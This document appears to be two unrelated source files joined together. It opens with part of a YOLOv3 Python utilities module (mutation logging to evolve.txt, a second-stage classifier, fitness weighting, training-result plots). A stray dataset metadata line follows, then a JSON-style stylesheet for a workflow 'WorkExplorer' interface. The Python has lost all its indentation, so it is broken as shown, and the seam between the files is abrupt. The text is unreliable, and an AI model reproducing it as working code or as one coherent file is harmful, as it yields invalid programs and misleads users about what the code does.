print_results(k)
k = print_results(k)
return k
def print_mutation(hyp, results, bucket=''):
# Print mutation results to evolve.txt (for use with train.py --evolve)
a = '%10s' * len(hyp) % tuple(hyp.keys()) # hyperparam keys
b = '%10.3g' * len(hyp) % tuple(hyp.values()) # hyperparam values
c = '%10.4g' * len(results) % results # results (P, R, mAP, F1, test_loss)
print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c))
if bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % bucket) # download evolve.txt
with open('evolve.txt', 'a') as f: # append result
f.write(c + b + '\n')
x = np.unique(np.loadtxt('evolve.txt', ndmin=2), axis=0) # load unique rows
np.savetxt('evolve.txt', x[np.argsort(-fitness(x))], '%10.3g') # save sort by fitness
if bucket:
os.system('gsutil cp evolve.txt gs://%s' % bucket) # upload evolve.txt
def apply_classifier(x, model, img, im0):
# applies a second stage classifier to yolo outputs
im0 = [im0] if isinstance(im0, np.ndarray) else im0
for i, d in enumerate(x): # per image
if d is not None and len(d):
d = d.clone()
# Reshape and pad cutouts
b = xyxy2xywh(d[:, :4]) # boxes
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square
b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad
d[:, :4] = xywh2xyxy(b).long()
# Rescale boxes from img_size to im0 size
scale_coords(img.shape[2:], d[:, :4], im0[i].shape)
# Classes
pred_cls1 = d[:, 5].long()
ims = []
for j, a in enumerate(d): # per item
cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])]
im = cv2.resize(cutout, (224, 224)) # BGR
# cv2.imwrite('test%i.jpg' % j, cutout)
im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
ims.append(im)
pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction
x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections
return x
def fitness(x):
# Returns fitness (for use with results.txt or evolve.txt)
w = [0.0, 0.00, 1, 0.00] # weights for [P, R, mAP, F1]@0.5 or [P, R, [email protected], [email protected]:0.95]
return (x[:, :4] * w).sum(1)
def output_to_target(output, width, height):
"""
Convert a YOLO model output to target format
[batch_id, class_id, x, y, w, h, conf]
"""
if isinstance(output, torch.Tensor):
output = output.cpu().numpy()
targets = []
for i, o in enumerate(output):
if o is not None:
for pred in o:
box = pred[:4]
w = (box[2] - box[0]) / width
h = (box[3] - box[1]) / height
x = box[0] / width + w / 2
y = box[1] / height + h / 2
conf = pred[4]
cls = int(pred[5])
targets.append([i, cls, x, y, w, h, conf])
return np.array(targets)
# Plotting functions ---------------------------------------------------------------------------------------------------
def plot_one_box(x, img, color=None, label=None, line_thickness=None):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def plot_wh_methods(): # from utils.utils import *; plot_wh_methods()
# Compares the two methods for width-height anchor multiplication
# https://github.com/ultralytics/yolov3/issues/168
x = np.arange(-4.0, 4.0, .1)
ya = np.exp(x)
yb = torch.sigmoid(torch.from_numpy(x)).numpy() * 2
fig = plt.figure(figsize=(6, 3), dpi=150)
plt.plot(x, ya, '.-', label='yolo method')
plt.plot(x, yb ** 2, '.-', label='^2 power method')
plt.plot(x, yb ** 2.5, '.-', label='^2.5 power method')
plt.xlim(left=-4, right=4)
plt.ylim(bottom=0, top=6)
plt.xlabel('input')
plt.ylabel('output')
plt.legend()
fig.tight_layout()
fig.savefig('comparison.png', dpi=200)
def plot_images(images, targets, paths=None, fname='images.jpg', names=None, max_size=640, max_subplots=16):
tl = 3 # line thickness
tf = max(tl - 1, 1) # font thickness
if isinstance(images, torch.Tensor):
images = images.cpu().numpy()
if isinstance(targets, torch.Tensor):
targets = targets.cpu().numpy()
# un-normalise
if np.max(images[0]) <= 1:
images *= 255
bs, _, h, w = images.shape # batch size, _, height, width
bs = min(bs, max_subplots) # limit plot images
ns = np.ceil(bs ** 0.5) # number of subplots (square)
# Check if we should resize
scale_factor = max_size / max(h, w)
if scale_factor < 1:
h = math.ceil(scale_factor * h)
w = math.ceil(scale_factor * w)
# Empty array for output
mosaic = np.full((int(ns * h), int(ns * w), 3), 255, dtype=np.uint8)
# Fix class - colour map
prop_cycle = plt.rcParams['axes.prop_cycle']
# https://stackoverflow.com/questions/51350872/python-from-color-name-to-rgb
hex2rgb = lambda h: tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
color_lut = [hex2rgb(h) for h in prop_cycle.by_key()['color']]
for i, img in enumerate(images):
if i == max_subplots: # if last batch has fewer images than we expect
break
block_x = int(w * (i // ns))
block_y = int(h * (i % ns))
img = img.transpose(1, 2, 0)
if scale_factor < 1:
img = cv2.resize(img, (w, h))
mosaic[block_y:block_y + h, block_x:block_x + w, :] = img
if len(targets) > 0:
image_targets = targets[targets[:, 0] == i]
boxes = xywh2xyxy(image_targets[:, 2:6]).T
classes = image_targets[:, 1].astype('int')
gt = image_targets.shape[1] == 6 # ground truth if no conf column
conf = None if gt else image_targets[:, 6] # check for confidence presence (gt vs pred)
boxes[[0, 2]] *= w
boxes[[0, 2]] += block_x
boxes[[1, 3]] *= h
boxes[[1, 3]] += block_y
for j, box in enumerate(boxes.T):
cls = int(classes[j])
color = color_lut[cls % len(color_lut)]
cls = names[cls] if names else cls
if gt or conf[j] > 0.3: # 0.3 conf thresh
label = '%s' % cls if gt else '%s %.1f' % (cls, conf[j])
plot_one_box(box, mosaic, label=label, color=color, line_thickness=tl)
# Draw image filename labels
if paths is not None:
label = os.path.basename(paths[i])[:40] # trim to 40 char
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
cv2.putText(mosaic, label, (block_x + 5, block_y + t_size[1] + 5), 0, tl / 3, [220, 220, 220], thickness=tf,
lineType=cv2.LINE_AA)
# Image border
cv2.rectangle(mosaic, (block_x, block_y), (block_x + w, block_y + h), (255, 255, 255), thickness=3)
if fname is not None:
cv2.imwrite(fname, cv2.cvtColor(mosaic, cv2.COLOR_BGR2RGB))
return mosaic
def plot_test_txt(): # from utils.utils import *; plot_test()
# Plot test.txt histograms
x = np.loadtxt('test.txt', dtype=np.float32)
box = xyxy2xywh(x[:, :4])
cx, cy = box[:, 0], box[:, 1]
fig, ax = plt.subplots(1, 1, figsize=(6, 6))
ax.hist2d(cx, cy, bins=600, cmax=10, cmin=0)
ax.set_aspect('equal')
fig.tight_layout()
plt.savefig('hist2d.png', dpi=300)
fig, ax = plt.subplots(1, 2, figsize=(12, 6))
ax[0].hist(cx, bins=600)
ax[1].hist(cy, bins=600)
fig.tight_layout()
plt.savefig('hist1d.png', dpi=200)
def plot_targets_txt(): # from utils.utils import *; plot_targets_txt()
# Plot targets.txt histograms
x = np.loadtxt('targets.txt', dtype=np.float32).T
s = ['x targets', 'y targets', 'width targets', 'height targets']
fig, ax = plt.subplots(2, 2, figsize=(8, 8))
ax = ax.ravel()
for i in range(4):
ax[i].hist(x[i], bins=100, label='%.3g +/- %.3g' % (x[i].mean(), x[i].std()))
ax[i].legend()
ax[i].set_title(s[i])
fig.tight_layout()
plt.savefig('targets.jpg', dpi=200)
def plot_evolution_results(hyp): # from utils.utils import *; plot_evolution_results(hyp)
# Plot hyperparameter evolution results in evolve.txt
x = np.loadtxt('evolve.txt', ndmin=2)
f = fitness(x)
weights = (f - f.min()) ** 2 # for weighted results
fig = plt.figure(figsize=(12, 10))
matplotlib.rc('font', **{'size': 8})
for i, (k, v) in enumerate(hyp.items()):
y = x[:, i + 7]
# mu = (y * weights).sum() / weights.sum() # best weighted result
mu = y[f.argmax()] # best single result
plt.subplot(4, 5, i + 1)
plt.plot(mu, f.max(), 'o', markersize=10)
plt.plot(y, f, '.')
plt.title('%s = %.3g' % (k, mu), fontdict={'size': 9}) # limit to 40 characters
print('%15s: %.3g' % (k, mu))
fig.tight_layout()
plt.savefig('evolve.png', dpi=200)
def plot_results_overlay(start=0, stop=0): # from utils.utils import *; plot_results_overlay()
# Plot training results files 'results*.txt', overlaying train and val losses
s = ['train', 'train', 'train', 'Precision', '[email protected]', 'val', 'val', 'val', 'Recall', 'F1'] # legends
t = ['GIoU', 'Objectness', 'Classification', 'P-R', 'mAP-F1'] # titles
for f in sorted(glob.glob('results*.txt') + glob.glob('../../Downloads/results*.txt')):
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
fig, ax = plt.subplots(1, 5, figsize=(14, 3.5))
ax = ax.ravel()
for i in range(5):
for j in [i, i + 5]:
y = results[j, x]
if i in [0, 1, 2]:
y[y == 0] = np.nan # dont show zero loss values
ax[i].plot(x, y, marker='.', label=s[j])
ax[i].set_title(t[i])
ax[i].legend()
ax[i].set_ylabel(f) if i == 0 else None # add filename
fig.tight_layout()
fig.savefig(f.replace('.txt', '.png'), dpi=200)
def plot_results(start=0, stop=0, bucket='', id=()): # from utils.utils import *; plot_results()
# Plot training 'results*.txt' as seen in https://github.com/ultralytics/yolov3#training
fig, ax = plt.subplots(2, 5, figsize=(12, 6))
ax = ax.ravel()
s = ['GIoU', 'Objectness', 'Classification', 'Precision', 'Recall',
'val GIoU', 'val Objectness', 'val Classification', '[email protected]', 'F1']
if bucket:
os.system('rm -rf storage.googleapis.com')
files = ['https://storage.googleapis.com/%s/results%g.txt' % (bucket, x) for x in id]
else:
files = glob.glob('results*.txt') + glob.glob('../../Downloads/results*.txt')
for f in sorted(files):
try:
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
for i in range(10):
y = results[i, x]
if i in [0, 1, 2, 5, 6, 7]:
y[y == 0] = np.nan # dont show zero loss values
# y /= y[0] # normalize
ax[i].plot(x, y, marker='.', label=Path(f).stem, linewidth=2, markersize=8)
ax[i].set_title(s[i])
if i in [5, 6, 7]: # share train and val loss y axes
ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])
except:
print('Warning: Plotting error for %s, skipping file' % f)
fig.tight_layout()
ax[1].legend()
fig.savefig('results.png', dpi=200)
| {
"pile_set_name": "Github"
} |
{
"toolbarNode": {
"overflow": "hidden",
"height": "80px",
"border-bottom-left-radius": "0px",
"border-bottom-right-radius": "0px",
"border-bottom": "1px solid #314e69",
"border-right": "1px solid #314e69",
"border-left": "1px solid #314e69",
"margin-right": "0px",
"margin-left": "0px",
"background-color": "#4c6b87",
"position": "static"
},
"iconElementNode": {
"float": "left",
"width": "80px",
"height": "80px",
"background-position": "center center",
"background-repeat": "no-repeat",
"cursor": "pointer"
},
"titleElementNode": {
"float": "left",
"width": "180px",
"height": "80px",
"line-height": "80px",
"color": "#FFF",
"font-weight": "bold",
"font-family": "Microsoft YaHei",
"font-size": "18px",
"margin-left": "5px"
},
"toCompletedNode": {
"padding": "5px 10px",
"float": "right",
"margin-right": "30px",
"border": "1px solid #DDD",
"color": "#DDD",
"background": "#5d80a0",
"margin-top": "25px",
"cursor": "pointer",
"font-size": "14px",
"border-radius": "5px"
//"box-shadow": "0px 0px 0px #333"
},
"toCompletedNode_over": {
"border": "1px solid #666",
"color": "#666",
"background": "#d5e7f8"
},
"searchElementNode": {
"margin-left": "362px",
"overflow": "hidden"
},
"searchElementButtonNode": {
"float": "right",
"width": "80px",
"height": "80px",
"margin-right": "40px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/search.png) no-repeat center center",
"cursor": "pointer"
},
"searchElementInputAreaNode": {
"margin-right": "120px",
"text-align": "right"
},
"searchElementInputBoxNode": {
"margin-top": "25px",
"width": "80%",
"max-width": "500px",
"height": "30px",
"border-radius": "5px",
"background-color": "#EEE",
"float": "right",
"text-align": "center"
},
"searchElementInputNode": {
"width": "96%",
"height": "28px",
"border": "0px",
"font-family": "Microsoft YaHei",
"font-size": "14px",
"color": "#999",
"background": "transparent",
"-webkit-user-select": "auto",
"-moz-user-select": "auto"
},
"elementContentNode": {
"overflow": "auto",
"position": "static",
"-webkit-user-select": "text",
"-moz-user-select": "text",
"margin": "0px 0px"
},
"elementContentListNode": {
"overflow": "hidden",
"padding-bottom": "20px",
"margin-right": "10px",
"-webkit-user-select": "text",
"-moz-user-select": "text",
"margin-left": "10px"
},
"filterNode": {
"min-height": "40px",
"overflow": "hidden",
"border-bottom": "1px solid #999"
},
"viewFilterNode": {
"min-height": "40px",
"overflow": "hidden",
"border-bottom": "1px solid #999"
},
"viewFilterListAreaNode": {
"min-height": "40px",
"margin-right": "90px",
"overflow": "hidden"
},
"viewFilterListTitleNode": {
"width": "60px",
"font-size": "14px",
"color": "#666666",
"font-weight": "bold",
"float": "left",
"line-height": "40px",
"height": "40px"
},
"viewFilterListNode": {
"margin-left": "70px",
"min-height": "40px",
"overflow": "hidden"
},
"viewFilterSearchAreaNode": {
"min-height": "40px",
"overflow": "hidden",
"display": "none"
},
"viewFilterSearchInputAreaNode": {
"min-width": "300px",
"width": "40%",
"height": "24px",
"border": "1px solid #cccccc",
"margin-top": "7px",
"margin-bottom": "0px",
"float": "left",
"border-radius": "5px"
},
"viewFilterSearchInputAreaNode_custom": {
"width": "auto",
"height": "80px",
"border": "1px solid #cccccc",
"margin-top": "7px",
"float": "none",
"border-radius": "5px",
"margin-bottom": "7px"
},
"viewFilterSearchCustomActionNode": {
"height": "22px",
"line-height": "22px",
"border": "1px solid #cccccc",
"color": "#333333",
"text-align": "center",
"margin-top": "8px",
"padding": "0px 10px",
"float": "left",
"cursor": "pointer",
"border-radius": "5px",
"margin-left": "10px"
},
"viewFilterSearchIconNode": {
"height": "24px",
"width": "40px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/searchView.png) center center no-repeat",
"float": "right",
"cursor": "pointer"
},
"viewFilterSearchInputBoxNode": {
"margin-right": "40px",
"margin-left": "5px",
"height": "24px",
"overflow": "hidden"
},
"viewFilterSearchInputNode": {
"width": "99%",
"height": "22px",
"color": "#999999",
"border-radius": "5px",
"border": "0px"
},
"viewFilterSearchCustomCloseActionNode": {
"width": "20px",
"height": "80px",
"float": "right",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/back.png) center 5px no-repeat",
"cursor": "pointer"
},
"viewFilterSearchCustomContentNode": {
"height": "80px",
"margin-right": "20px"
},
"viewFilterSearchCustomPathContentNode": {
"height": "80px",
"border-right": "1px solid #cccccc",
"width": "99px",
"float": "left"
},
"viewFilterSearchCustomComparisonContentNode": {
"height": "80px",
"border-right": "1px solid #cccccc",
"width": "99px",
"float": "left"
},
"viewFilterSearchCustomValueContentNode": {
"height": "80px",
"border-right": "1px solid #cccccc",
"width": "199px",
"float": "left"
},
"viewFilterSearchCustomAddContentNode": {
"width": "19px",
"height": "80px",
"border-right": "1px solid #cccccc",
"background-color": "#eeeeee",
"float": "left",
"cursor": "pointer"
},
"viewFilterSearchCustomAddIconNode": {
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/right.png) center center no-repeat",
"height": "80px"
},
"viewFilterSearchCustomFilterContentNode": {
"height": "74px",
"padding": "3px",
"overflow": "auto",
"margin-left": "420px"
},
"viewFilterSearchCustomPathListNode": {
"border": "0px",
"border-radius": "5px",
"height": "80px",
"padding": "3px",
"width": "99px",
"font-size": "12px"
},
"viewFilterSearchCustomComparisonListNode": {
"border": "0px",
"height": "80px",
"padding": "3px",
"width": "99px",
"font-size": "12px"
},
"viewFilterSearchOptionNode": {
"margin": "3px"
},
"viewFilterSearchCustomValueNode": {
"border": "0px",
"height": "78px",
"overflow": "auto",
"width": "197px"
},
"viewFilterSearchCustomValueSelectNode": {
"border": "0px",
"padding": "2px",
"height": "74px",
"overflow": "auto",
"width": "194px"
},
"viewSearchFilterNode": {
"height": "19px",
"margin": "2px",
"line-height": "19px",
"border": "1px solid #cccccc",
"border-radius": "3px",
"cursor": "pointer",
"color": "#666666",
"float": "left"
},
"viewSearchFilterNode_over": {
"border": "1px solid #fe9145",
//"color": "#fe9145",
},
"viewSearchFilterTextNode": {
"height": "19px",
"padding": "0px 3px",
"float": "left"
},
"viewSearchFilterDeleteNode": {
"width": "20px",
"height": "19px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delFilter.png) center center no-repeat",
"float": "left"
},
"viewSearchFilterDeleteNode_over": {
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delFilter_over.png) center center no-repeat"
},
"viewSearchFilterSelectAreaNode": {
"height": "17px",
"padding": "0px 3px",
"margin": "1px 3px",
"background-color": "#dddddd",
"border-radius": "8px",
"color": "#333333",
"float": "left"
},
"viewSearchFilterSelectNode": {
"line-height": "17px",
"height": "15px",
"padding": "0px 2px",
"font-size": "11px",
"float": "left"
},
"viewSearchFilterSelectButtonNode": {
"float": "right",
"height": "13px",
"width": "13px",
"margin": "2px 0px",
"border-radius": "6px",
"background-color": "#666666",
},
"viewSearchFilterSelectButtonNode_over": {
"background-color": "#fe9145"
},
"exportViewNode": {
"padding": "3px 10px",
"float": "right",
"margin-right": "5px",
"margin-top": "5px",
"border": "1px solid #CCC",
"cursor": "pointer",
"background-color": "#FFF",
"border-radius": "5px",
"color": "#000"
},
"filterAllProcessNode": {
"height": "40px",
"width": "80px",
"float": "left",
"line-height": "40px",
"font-size": "18px",
"text-align": "center",
"cursor": "pointer",
"font-weight": "bold"
},
"filterAllProcessCountNode":{
"font-size": "14px",
"color": "#666"
},
"filterActionAreaNode":{
"height": "40px",
"width": "80px",
"float": "right"
},
"filterActionNode":{
"margin": "7px 25px 7px 5px",
"height": "26px",
"width": "50px",
"cursor": "pointer",
"background-color": "#5d7282",
"border": "1px solid #666666",
"border-radius": "3px",
"line-height": "26px",
"text-align": "center",
"color": "#FFF"
},
"filterActionNode_over":{
"background-color": "#ff7010",
"border": "1px solid #ff7010"
},
"filterProcessAreaNode": {
"margin": "0px 80px",
"min-height": "40px",
"overflow": "hidden"
},
"filterProcessListNode": {
"margin": "8px",
"line-height": "24px"
},
"filterProcessNode": {
"float": "left",
"margin-left": "10px",
"margin-right": "10px",
"color": "#666",
"cursor": "pointer",
"font-size": "14px",
"font-weight": "normal"
},
"filterProcessNode_current": {
"font-weight": "bold",
"color": "#0000FF",
"font-size": "16px"
},
"filterAreaNode": {
"border": "1px solid #999",
"border-radius": "0px",
"box-shadow": "0px 6px 10px #999",
"background-color": "#FFF",
"display": "block",
"position": "absolute"
},
"filterAreaTipNode":{
"width": "24px",
"height": "6px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/sj.png) center top no-repeat",
},
"filterAreaTitleNode": {
"height": "50px",
"overflow": "hidden",
"border-bottom": "1px solid #999"
},
"filterAreaTitleActionOkNode": {
"margin-top": "13px",
"height": "22px",
"line-height": "22px",
"width": "40px",
"cursor": "pointer",
"border-radius": "3px",
"color": "#ff7010",
"background-color": "#FFF",
"border": "1px solid #ff7010",
"float": "right",
"text-align": "center",
"font-size": "12px",
"margin-right": "10px"
},
"filterAreaTitleActionClearNode": {
"margin-top": "13px",
"height": "22px",
"line-height": "22px",
"width": "40px",
"cursor": "pointer",
"border-radius": "3px",
"color": "#666",
"background-color": "#FFF",
"border": "1px solid #666",
"float": "right",
"text-align": "center",
"font-size": "12px",
"margin-right": "10px"
},
"filterAreaTitleSearchNode": {
"margin": "13px 120px 0px 15px",
"height": "22px",
"border": "1px solid #CCC",
"border-radius": "4px"
},
"filterAreaTitleSearchIconNode": {
"height": "22px",
"width": "22px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/filterSearch.png) center center no-repeat",
"float": "left"
},
"filterAreaTitleSearchInputAreaNode": {
"height": "22px",
"border": "0px",
"margin-left": "22px"
},
"filterAreaTitleSearchInputNode": {
"height": "20px",
"border": "0px",
"color": "#999",
"width": "98%",
"font-size": "12px",
"line-height": "20px"
},
"applicationFilterAreaContentScrollNode": {
"height": "410px",
"width": "400px",
"margin": "20px 0px 20px 20px",
"overflow": "hidden",
"float": "left"
},
"applicationFilterCategoryNode": {
"font-size": "12px",
"line-height": "28px",
"height": "28px",
"background-color": "#EEE",
"padding": "0px 5px",
"color": "#333",
"border-top": "0px solid #CCC",
"margin-bottom": "3px"
},
"applicationFilterItemAreaNode":{
"overflow": "hidden",
"margin-left": "10px",
"margin-bottom": "8px"
},
"applicationFilterItemNode": {
"padding": "3px",
"margin-top": "3px",
"margin-bottom": "2px",
"margin-left": "5px",
"float": "left",
"color": "#4a5bc4",
"background-color": "#FFF",
"cursor": "pointer",
"border": "1px solid #CCC"
},
"applicationFilterItemNode_over": {
"color": "#FFF",
"background-color": "#4c6b87",
"border": "1px solid #4c6b87"
},
"filterConditionNode": {
"height": "30px",
"margin-left": "10px",
"overflow": "hidden"
},
"filterListItemNode": {
"height": "24px",
"line-height": "24px",
"font-size": "12px",
"border": "1px solid #CCC",
"float": "left",
"margin-right": "10px",
"padding-left": "8px",
"margin-top": "4px",
"background-color": "#FFF",
"cursor": "default"
},
"filterListItemActionNode": {
"float": "right",
"height": "24px",
"width": "24px",
"cursor": "pointer",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/closeFilter.png) center center no-repeat"
},
"filterListItemTextNode": {
"height": "24px",
"cursor": "default",
"margin-right": "30px",
"color": "#666"
},
"filterListItemNode_over": {
"border": "1px solid #ff7010"
},
"filterListItemActionNode_over": {
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/closeFilterOver.png) center center no-repeat"
},
"filterListItemTextNode_over": {
"color": "#ff7010"
},
"workItemHeadNode": {
"margin-top": "5px",
"height": "40px",
"background-color": "#dddddd",
"color": "#666666",
"font-weight": "bold",
"line-height": "40px",
"font-family": "Microsoft YaHei",
"font-size": "14px"
},
"headArea1Node": {
"width": "38%",
"float": "left"
},
"headArea2Node": {
"width": "22%",
"float": "left"
},
"headArea3Node": {
"width": "40%",
"float": "left"
},
"checkAreaHeadNode": {
"width": "24px",
"float": "left",
"height": "40px"
},
"iconAreaHeadNode": {
"width": "24px",
"float": "left"
},
"titleAreaHeadNode": {
"margin-left": "48px",
"height": "40px"
},
"titleAreaTextNode": {
"padding": "10px 5px",
"height": "20px"
},
"statusAreaHeadNode": {
"width": "58px",
"float": "left",
"height": "40px"
},
"timeAreaHeadNode": {
"width": "90px",
"float": "left",
"height": "40px",
"line-height": "40px"
},
"activityAreaHeadNode": {
"margin-left": "58px",
"height": "40px"
},
"processAreaHeadNode": {
"margin-left": "90px",
"height": "40px"
},
"activityAreaTextNode": {
"padding": "10px 5px",
"height": "20px"
},
"processAreaTextNode": {
"padding": "10px 5px",
"height": "20px"
},
"personAreaHeadNode": {
"height": "40px",
"line-height": "40px",
"margin-right": "240px"
},
"actionAreaHeadNode": {
"width": "110px",
"float": "right",
"height": "40px"
},
"expireAreaHeadNode": {
"width": "130px",
"float": "right",
"height": "40px"
},
"workItemNode": {
"background-color": "#F6F6F6",
"border-top": "1px solid #FFF",
"border-bottom": "1px solid #CCC",
"overflow": "hidden"
},
"workItemNode_noread": {
"background-color": "#F6F6F6"
},
"workItemWorkNode_over": {
"background-color": "#f1f3fc"
},
"workItemWorkNode_remove": {
"background-color": "#ffcccc"
},
"workItemWorkNode_action": {
"background": "#cedaff"
},
"workItemWorkNode":{
"background-color": "#F6F6F6",
"min-height": "39px",
"overflow": "hidden",
"color": "#666666",
//"line-height": "39px",
"cursor": "pointer",
"font-family": "Microsoft YaHei",
"font-size": "12px"
},
"statusIconNode": {
"height": "39px",
"width": "16px",
"float": "left",
"background-repeat": "no-repeat",
"background-position": "center center"
},
"iconWorkNode": {
"height": "39px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/work.png) no-repeat center center",
},
"titleWorkNode": {
"font-weight": "bold"
},
"expireAreaNode": {
"padding": "10px 0px",
"height": "20px"
},
"actionStopWorkNode": {
"height": "39px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/stop.png) no-repeat center center",
},
"actionStopWorkActionNode": {
"height": "39px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/stop.png) no-repeat 5px center",
},
"actionOpenNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "22px",
"line-height": "20px",
"margin-top": "10px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/open.png) no-repeat center center"
},
"actionOpenNode_over":{
"box-shadow": "1px 1x 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/open_over.png) no-repeat center center",
"background-color": "#666"
},
"actionOpenNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"actionProcessNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "10px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/send.png) no-repeat center center"
},
"actionProcessNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/send_over.png) no-repeat center center",
"background-color": "#666"
},
"actionProcessNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"actionRerouteNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "10px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/route.png) no-repeat center center"
},
"actionRerouteNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/route_over.png) no-repeat center center",
"background-color": "#666"
},
"actionRerouteNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"actionDeleteNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "10px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delete.png) no-repeat center center"
},
"actionDeleteNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delete_over.png) no-repeat center center",
"background-color": "#666"
},
"actionDeleteNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"workItemChildNode": {
"border-top": "1px solid #DDD",
"background-color": "#FFF",
"overflow": "hidden",
"padding-left": "50px"
},
"workItemTaskNode": {
"overflow": "hidden"
},
"workItemDonwNode": {
"overflow": "hidden"
},
"workItemReadNode": {
"overflow": "hidden"
},
"workItemReadedNode": {
"overflow": "hidden"
},
"workItemListTitleNode": {
"height": "30px",
"overflow": "hidden"
},
"workItemTaskTitleNode": {
"height": "30px",
"line-height": "30px",
"font-weight": "bold",
"color": "#2fade7",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/task.png) no-repeat 4px center",
"padding-left": "24px"
},
"workItemDoneTitleNode": {
"height": "30px",
"line-height": "30px",
"font-weight": "bold",
"color": "#2fade7",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/done.png) no-repeat 4px center",
"padding-left": "24px"
},
"workItemReadTitleNode": {
"height": "30px",
"line-height": "30px",
"font-weight": "bold",
"color": "#2fade7",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/read.png) no-repeat 4px center",
"padding-left": "24px"
},
"workItemReadedTitleNode": {
"height": "30px",
"line-height": "30px",
"font-weight": "bold",
"color": "#2fade7",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/readed.png) no-repeat 4px center",
"padding-left": "24px"
},
"taskAreaContentNode": {
"border-top": "1px solid #DDD",
"margin-bottom": "5px",
"overflow": "hidden"
},
"doneAreaContentNode": {
"border-top": "1px solid #DDD",
"margin-bottom": "5px",
"overflow": "hidden"
},
"readAreaContentNode": {
"border-top": "1px solid #DDD",
"margin-bottom": "5px",
"overflow": "hidden"
},
"readedAreaContentNode": {
"border-top": "1px solid #DDD",
"margin-bottom": "5px",
"overflow": "hidden"
},
"taskItemNode": {
"height": "30px",
"line-height": "30px",
"color": "#666",
"background": "transparent",
"border-bottom": "1px solid #EEE"
},
"taskItemNode_action": {
"background": "#cedaff"
},
"taskItemNode_remove": {
"background": "#ffeeee"
},
"taskArea1Node": {
"float": "left",
"width": "34%",
"overflow": "hidden",
"max-width": "300px"
},
"taskArea2Node": {
"float": "left",
"width": "16%",
"overflow": "hidden",
"max-width": "160px"
},
"taskArea3Node": {
"float": "left",
"width": "50%",
"overflow": "hidden"
},
"taskItemIconAreaNode": {
"margin-left": "30px",
"height": "30px",
"float": "left",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/list.png) no-repeat center center",
"width": "12px"
},
"taskItemPersonAreaNode": {
"margin-left": "42px",
